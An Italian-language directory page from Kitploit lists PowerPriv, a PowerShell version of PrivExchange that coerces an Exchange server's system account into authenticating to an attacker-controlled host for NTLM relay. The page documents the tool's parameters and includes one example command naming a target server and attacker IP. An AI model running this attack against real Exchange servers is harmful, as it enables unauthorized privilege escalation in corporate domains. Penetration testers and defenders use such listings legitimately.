Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
PowerPriv — Un'implementazione in Powershell di PrivExchange progettata per essere eseguita nel contesto dell'utente corrente. | Kitploit
Strumenti/GitHubGitHub/g0ldengunsec/powerpriv
Escalation di PrivilegiExploitMovimento LateralePenetration TestingAutenticazione
GitHubg0ldengunsec/powerpriv

PowerPriv

Un'implementazione in Powershell di PrivExchange progettata per essere eseguita nel contesto dell'utente corrente.

Vedi Repository
125247 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

PowerPriv

DESCRIZIONE

Un'implementazione in PowerShell di PrivExchange by @_dirkjan (codice originale qui: https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py) Utile per ambienti in cui non è possibile eseguire applicazioni basate su Python, si dispone di credenziali utente o non si vogliono scrivere file su disco. Farà sì che l'account di sistema del server Exchange di destinazione tenti di autenticarsi su un sistema a scelta.

-targetHost

Nome host o IP del server Exchange di destinazione. In base alla configurazione DNS potrebbe essere necessario il FQDN se si utilizza il nome host. (Obbligatorio)

-attackerHost

Nome host o IP di un sistema da te controllato, sul quale idealmente stai eseguendo ntlmrelayx. Stiamo dicendo al server Exchange di tentare di autenticarsi su questo sistema. In base alla configurazione DNS potrebbe essere necessario il FQDN se si utilizza il nome host. (Obbligatorio)

-exchangePort

Porta su cui tentare la connessione al server Exchange. Il default è 443.

-attackerPort

Porta su cui Exchange dovrebbe tentare di riconnettersi all'attaccante. Il default è 80

-attackerPage

Pagina che stiamo dicendo al server Exchange di contattare sul nostro sistema di attacco. Le barre non sono necessarie. Il default è powerPriv.

-noSSL

Impostare a true se non si desidera utilizzare https per la connessione iniziale al server Exchange. Il default è false (usa https).

-Version

Versione del server Exchange di destinazione. Il default è 2013.

ESEMPIO

root@kitploit:~
powerPriv -targetHost corpExch01 -attackerHost 192.168.1.17 -Version 2016

NOTE

root@kitploit:~
Autore: @g0ldenGunSec  - Basato sullo strumento creato da @_dirkjan
Utilizza questo strumento solo su reti di tua proprietà o per le quali hai il permesso di test.
Scarica lo strumento